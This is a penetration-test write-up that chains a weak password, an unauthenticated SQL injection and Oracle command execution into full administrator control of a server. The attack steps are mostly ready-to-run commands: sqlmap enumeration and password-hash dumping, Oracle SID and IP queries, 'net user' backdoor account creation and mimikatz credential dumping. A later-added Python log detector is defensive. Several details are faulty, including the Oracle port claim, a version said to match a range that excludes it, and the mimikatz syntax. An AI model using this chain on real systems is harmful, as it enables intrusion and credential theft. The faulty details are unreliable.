
Title: From weak password to getshell at one time


0x01 Weak password

While collecting information on a target site, a subdomain scan turned up an old system.


Seeing that this was an old system from 2014, I figured there had to be something wrong with it!

I tried brute-forcing with Burp and my everyday wordlist, but nothing came out.

But after a quick manual try, I got into the system with 123/123. Pure luck.

(screenshot heavily redacted)


Here we can see that the account only has the permissions of an "editor" user; there are no backend management functions such as file upload. All we can do is patiently go through each function of the system.

0x02 SQL injection

After entering the system and poking around, there was no sensitive information leak, but SQL injection was found on a personnel-information query interface (picked up by xray's passive scan):

http://host.com/xxx/control/SearchMenHunInfo?content=123

When verifying it manually, it turns out the interface can be accessed directly without even a backend session cookie, which amounts to an unauthenticated access vulnerability.

So sqlmap can be run straight against it; the --cookie parameter is not needed:

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' --current-db


The database name is there, and you can also see that this is an Oracle database. I planned to try for a shell.

However, Oracle databases are not common in my day-to-day penetration testing. sqlmap's --os-shell parameter still does not support Oracle, so I had to learn as I went.
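As an added defensive example (not from the original write-up), here is Python detection logic for the chain described in this section, run over constructed access-log lines: it flags requests to the personnel query endpoint that arrive without a session cookie, the default sqlmap User-Agent, and injection or Oracle enumeration tokens in the content parameter. The endpoint path is from the article; the log format and the JSESSIONID cookie name are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines: combined log format plus the Cookie header as a final
# quoted field. IPs, timestamps and session ids are fictional.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Aug/2021:15:02:11 +0800] "GET /xxx/control/SearchMenHunInfo?content=zhang HTTP/1.1" 200 1532 "-" "Mozilla/5.0" "JSESSIONID=abc123"
10.0.0.9 - - [16/Aug/2021:15:04:27 +0800] "GET /xxx/control/SearchMenHunInfo?content=123 HTTP/1.1" 200 1532 "-" "Mozilla/5.0" "-"
10.0.0.9 - - [16/Aug/2021:15:05:03 +0800] "GET /xxx/control/SearchMenHunInfo?content=123%27%20AND%201%3D1-- HTTP/1.1" 200 1532 "-" "sqlmap/1.5#stable (https://sqlmap.org)" "-"
10.0.0.9 - - [16/Aug/2021:15:06:40 +0800] "GET /xxx/control/SearchMenHunInfo?content=1%20UNION%20SELECT%20instance_name%20FROM%20v%24instance HTTP/1.1" 200 2010 "-" "Mozilla/5.0" "JSESSIONID=abc123"
10.0.0.5 - - [16/Aug/2021:15:07:00 +0800] "GET /xxx/index.jsp HTTP/1.1" 200 800 "-" "Mozilla/5.0" "JSESSIONID=abc123"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3} \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"')
QUERY_ENDPOINT = "/xxx/control/SearchMenHunInfo"  # path from the write-up
SESSION_COOKIE = "JSESSIONID"                     # assumed session cookie name
# Generic injection tokens plus the Oracle enumeration markers used in the write-up.
SQLI_RE = re.compile(
    r"('|--|/\*|\bunion\b|\bselect\b|\bdbms_pipe\b|v\$instance|sys_context|"
    r"\bfrom\s+dual\b)", re.IGNORECASE)

def analyse_line(line):
    """Return the finding tags for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable"]
    url = urlparse(m["url"])
    # parse_qs already percent-decodes, so encoded quotes and spaces become visible
    content = " ".join(parse_qs(url.query).get("content", []))
    findings = []
    if url.path == QUERY_ENDPOINT and SESSION_COOKIE not in m["cookie"]:
        findings.append("unauthenticated_query")  # the auth gap the author found
    if "sqlmap" in m["ua"].lower():
        findings.append("sqlmap_user_agent")      # default UA, trivially changed
    if url.path == QUERY_ENDPOINT and SQLI_RE.search(content):
        findings.append("sqli_pattern")
    return findings

def analyse_log(text):
    """Group findings by source IP, keeping only IPs that triggered something."""
    report = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        hits = analyse_line(line)
        if m and hits:
            report.setdefault(m["ip"], set()).update(hits)
    return report
```

The missing-session-cookie check is the durable signal: the User-Agent match only catches default-configuration scans, and the token list will false-positive on names containing an apostrophe, so tune it to the site.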

0x03 getshell

First I referred to this article: Oracle Injection - Command Execution and Reverse Shell

It lists the Oracle versions on which commands can be executed once an injection is found (the list is repeated in step 6 of the summary below).

Then use sqlmap to view the Oracle version (banner):

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' -b


It appears to match a version on which commands can be executed!

After another long round of reading, I found that someone on GitHub had packaged Oracle database command execution into a tool called oracleShell.

[Tool screenshot]

As can be seen, we also need to know the database SID, username and password before we can try to execute commands.

So continue using sqlmap to expand what we know.

View database privileges: --is-dba


View the database IP and SID

Here we enter sqlmap's --sql-shell mode and query with SQL statements:

Query SID: select instance_name from v$instance

Query the current IP: select sys_context('userenv','ip_address') from dual


Dump all database accounts and passwords

Use sqlmap's --passwords parameter to dump the database usernames and their password hashes.

After a long wait, the result finally came back (fictional data is shown here):

database management system users password hashes:
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] HR [1]:
    password hash: 6399F3B38EDF3288
[*] SYS [1]:
    password hash: 4DE42795E66117AE
[*] SYSMAN [1]:
    password hash: B607EEBB3A2D36D0
[*] SYSTEM [1]:
    password hash: 8877FF8306EF558B
    clear-text password: SYS

You can see that for some usernames only the hash was obtained, but for the SYSTEM user the plaintext password was successfully cracked!

Look up common Oracle ports

I'm really not familiar with Oracle, so I looked the ports up on Baidu:

The search said that the default server port is generally 389 and the default client port is generally 1521.

OK! Now we have the IP, port, SID, username (SYSTEM) and password (SYS), and can connect directly with the tool.


Excellent! System privileges obtained!

0x04 Further demonstrating the impact

Try creating a user

net user name pwd /add

net localgroup Administrators name /add

Connect via Remote Desktop (RDP) with name/pwd


The connection was successful!

Upload mimikatz and grab the administrator's plaintext password

privilege:debug

sekurlsa:logonPasswords


Finally logged in over RDP as the Administrator account.


At this point, the penetration ends.

0x05 Summary

Weak password -> SQL injection -> getshell -> administrator privileges

1. Scan the target domain with a subdomain scanning tool and find a human resource management system

2. Enter the system by manually testing the weak password 123/123

3. The backend personnel query has a SQL injection vulnerability (picked up by xray's passive scan)

4. Use sqlmap to identify the current database as Oracle

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' --current-db

5. sqlmap's --os-shell parameter does not support Oracle, so sensitive information can only be gathered through --sql-shell.

6. Query the Oracle version and find it is 10.2.1.0 (the Oracle versions on which commands can be executed are 8.1.7.4, 9.2.01-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2)

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' -b

7. Query database privileges: the account has DBA privileges

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' --is-dba

8. Use --sql-shell to find the database IP and SID

select instance_name from v$instance -- query the SID

select sys_context('userenv','ip_address') from dual -- query the current IP

9. Dump password hashes with sqlmap; the SYSTEM user's plaintext password is cracked

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' --passwords

10. Meanwhile, an nmap scan of the database server IP showed port 1521 open.

11. Connect to the database remotely with the oracleShell tool and execute system commands

12. Add a user with a password from the command line, add it to the Administrators group, and enable Remote Desktop through the registry.

net user name pwd /add

net localgroup Administrators name /add

13. Read system passwords with mimikatz

privilege:debug

sekurlsa:logonPasswords

Original link: https://www.freebuf.com/articles/web/284911.html
